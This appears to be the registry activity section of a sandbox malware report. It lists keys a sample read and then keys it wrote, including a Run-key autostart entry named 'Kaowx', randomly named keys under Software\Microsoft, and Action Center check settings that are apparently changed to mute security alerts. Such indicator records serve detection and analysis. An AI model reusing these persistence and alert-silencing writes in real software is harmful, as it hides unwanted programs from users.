HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\LastUpdateTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyCacheDate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\SYSTEM\0000\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPTPMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPTPMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\FriendlyName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\DeviceDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_SSTPMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_SSTPMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\*ISATAP\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\*ISATAP\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\DeviceDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\CIMV2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\CIMV2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging

Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Nihaem
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Woqiakr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Kaowx
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Gyawvy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.101\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0\CheckSetting
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\LanguageList
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.103\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.104\CheckSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}
